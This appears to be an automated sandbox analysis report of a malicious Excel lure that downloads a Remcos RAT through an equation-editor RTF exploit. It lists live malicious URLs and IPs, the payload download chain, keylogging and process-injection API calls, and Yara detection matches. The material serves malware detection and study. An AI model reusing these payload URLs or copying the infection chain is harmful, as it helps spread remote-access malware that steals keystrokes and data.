Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.72

Source: C:\Users\user\AppData\Roaming\csrss.exe

Code function: 8_2_33D5B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,

8_2_33D5B380

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CE2FF046.emf

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /download?resid=77E389B66C951B09%21132&authkey=!AD_QXcfalkvUogo HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
Source: global traffic	HTTP traffic detected: GET /NAvSGzZ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qr-in.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xampp/hgnn/hgn/lionsaretotalcontrollingtherulsofthejungletounderstandlionsarekindofjungletogetmebackonfiretogetittrueexperienc__ofhtejunglelions.doc HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 94.156.67.72Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /4020/csrss.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 94.156.67.72Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: qr-in.com
Source: global traffic	DNS traffic detected: DNS query: onedrive.live.com
Source: global traffic	DNS traffic detected: DNS query: f3rtrw.bl.files.1drv.com
Source: global traffic	DNS traffic detected: DNS query: wwsaer.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: geoplugin.net

Source: EQNEDT32.EXE, 00000006.00000002.420470851.00000000008EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.156.67.72/4020/csrss.exe
Source: EQNEDT32.EXE, 00000006.00000002.420470851.00000000008EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.156.67.72/4020/csrss.exej
Source: EQNEDT32.EXE, 00000006.00000002.420470851.00000000008EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.156.67.72/4020/csrss.exejjC:
Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp, csrss.exe, 00000008.00000002.1007133666.000000000077F000.00000004.00000001.00020000.00000000.sdmp, Efftwcmk.PIF	String found in binary or memory: http://geoplugin.net/json.gp
Source: csrss.exe, 00000008.00000002.1012207860.0000000033DAB000.00000040.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.473812700.000000007DBE0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000C.00000002.484496833.00000000272CB000.00000040.00000800.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpt
Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0C
Source: qr-in.com.url.4.dr	String found in binary or memory: http://qr-in.com/
Source: Home Purchase Contract and Property Details.xls, NAvSGzZ.url.4.dr	String found in binary or memory: http://qr-in.com/NAvSGzZ
Source: ~DF5534031E748409A6.TMP.0.dr, 0B430000.0.dr	String found in binary or memory: http://qr-in.com/NAvSGzZyX
Source: Home Purchase Contract and Property Details.xls, ~DF5534031E748409A6.TMP.0.dr, 31682C44.png.0.dr, ~DF78F515A159E2AA69.TMP.0.dr, 0B430000.0.dr, DF465E1C.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: Efftwcmk.PIF, Efftwcmk.PIF, 0000000B.00000002.464066991.0000000001E92000.00000004.00001000.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.465570467.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474420464.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.pmail.com
Source: csrss.exe, 00000008.00000002.1007133666.000000000077F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://f3rtrw.bl.files.1drv.com/y4mAd3mcZPGImnMlQzVaLUaRGLF5rJ6dTRnmjMGEyxD33cnd2H9ImAFk6GH06rI3KMc
Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp, csrss.exe, 00000008.00000002.1007133666.000000000077F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://f3rtrw.bl.files.1drv.com/y4mx_vDnHSZNTOhTMVLVmQRlGEek-eb6UO4R5ONQLcqQVc4RctseT_K1ezCYuH-Cc-_
Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://live.com/
Source: csrss.exe, 00000008.00000002.1011774881.000000003287D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/downlo
Source: csrss.exe, 00000008.00000002.1011774881.0000000032868000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/download?resid=77E389B66C951B09%21132&authkey=
Source: csrss.exe, 00000008.00000003.430261701.000000007DD80000.00000004.00000800.00020000.00000000.sdmp, csrss.exe, 00000008.00000003.430311842.000000007E3A0000.00000004.00000800.00020000.00000000.sdmp, Efftwcmk.PIF, 0000000B.00000002.474056612.000000007E280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: csrss.exe, 00000008.00000002.1007133666.0000000000723000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Users\user\AppData\Roaming\csrss.exe

Code function: 8_2_33D4A2B8 SetWindowsHookExA 0000000D,33D4A2A4,00000000

8_2_33D4A2B8

Installs a global keyboard hook

Source: C:\Users\user\AppData\Roaming\csrss.exe

Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\csrss.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\csrss.exe

Code function: 8_2_33D4B70E OpenClipboard,GetClipboardData,CloseClipboard,

8_2_33D4B70E

Source: C:\Users\user\AppData\Roaming\csrss.exe

Code function: 8_2_33D4B70E OpenClipboard,GetClipboardData,CloseClipboard,

8_2_33D4B70E

Source: C:\Users\user\AppData\Roaming\csrss.exe

Code function: 8_2_33D4A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,

8_2_33D4A3E0

Source: Yara match

File source: Process Memory Space: Efftwcmk.PIF PID: 1696, type: MEMORYSTR

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 11.2.Efftwcmk.PIF.2d220000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Efftwcmk.PIF.2d220000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.463489236.00000000006B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.479146346.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.473812700.000000007DBE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1007133666.000000000077F000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: csrss.exe PID: 3832, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Efftwcmk.PIF PID: 1696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Efftwcmk.PIF PID: 920, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\notes\logs.dat, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Users\user\AppData\Roaming\csrss.exe

Code function: 8_2_33D5C9E2 SystemParametersInfoW,

8_2_33D5C9E2

System Summary

Malicious sample detected (through community Yara rule)

Source: 11.2.Efftwcmk.PIF.2d220000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.Efftwcmk.PIF.2d220000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.Efftwcmk.PIF.2d220000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.Efftwcmk.PIF.2d220000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 11.2.Efftwcmk.PIF.2d220000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 11.2.Efftwcmk.PIF.2d220000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000000C.00000002.484496833.00000000272CB000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000008.00000002.1012207860.0000000033DAB000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000B.00000002.473812700.000000007DBE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000B.00000002.470885800.000000002D220000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: csrss.exe PID: 3832, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: Efftwcmk.PIF PID: 1696, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: Efftwcmk.PIF PID: 920, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lionsaretotalcontrollingtherulsofthejungletounderstandlionsarekindofjungletogetmebackonfiretogetittrueexperienc__ofhtejunglelions[1].doc, type: DROPPED	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\398EA60A.doc, type: DROPPED	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: Enable Editing from the 16 9 . . . - Baj jaros Mah. AtatUK yellow bar above " 10 '" " OeE zciler M
Source: Screenshot number: 4	Screenshot OCR: Enable Content from the yellow bar above 20 12 ' " Yoj :1ren KOyU, 1>nakkc 21 13 " Aky Cad. No:
Source: Screenshot number: 16	Screenshot OCR: Enable Content from the yellow bar above t 19 12 ' " VOID -en KOyU, 1>nakk 20 13 " AkW Cad.

Excel sheet contains many unusual embedded objects

Source: Home Purchase Contract and Property Details.xls	OLE: Microsoft Excel 2007+
Source: ~DF78F515A159E2AA69.TMP.0.dr	OLE: Microsoft Excel 2007+
Source: 0B430000.0.dr	OLE: Microsoft Excel 2007+

Microsoft Office drops suspicious files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\NAvSGzZ.url			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\qr-in.com.url			Jump to behavior

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\csrss.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\csrss[1].exe			Jump to dropped file

Source: C:\Users\user\AppData\Roaming\csrss.exe

Process Stats: CPU usage > 49%

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\csrss.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Memory allocated: 770B0000 page execute and read and write	Jump to behavior

Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D5BB09 OpenProcess,NtSuspendProcess,CloseHandle,	8_2_33D5BB09
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D5BB35 OpenProcess,NtResumeProcess,CloseHandle,	8_2_33D5BB35
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D532D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,	8_2_33D532D2
Source: C:\Users\user\AppData\Roaming\csrss.exe	Code function: 8_2_33D5D58F NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA,	8_2_33D5D58F
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C8D6D4 GetModuleHandleW,GetProcAddress,NtQueryInformationProcess,	11_2_02C8D6D4
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C8D654 GetModuleHandleW,GetProcAddress,NtQueryInformationProcess,	11_2_02C8D654
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C8C7B8 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	11_2_02C8C7B8
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C87A74 GetModuleHandleA,GetProcAddress,NtWriteVirtualMemory,	11_2_02C87A74
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C87924 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,	11_2_02C87924
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C8816E CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread,	11_2_02C8816E
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C88170 CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread,	11_2_02C88170
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C8C6D2 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	11_2_02C8C6D2
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C8C6D4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	11_2_02C8C6D4
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C87A72 GetModuleHandleA,GetProcAddress,NtWriteVirtualMemory,	11_2_02C87A72
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C87922 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,	11_2_02C87922
Source: C:\Users\Public\Libraries\Efftwcmk.PIF	Code function: 11_2_02C87CA8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,	11_2_02C87CA8

Source: C:\Users\Public\Libraries\Efftwcmk.PIF

Code function: 11_2_02C8816E CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread,

11_2_02C8816E

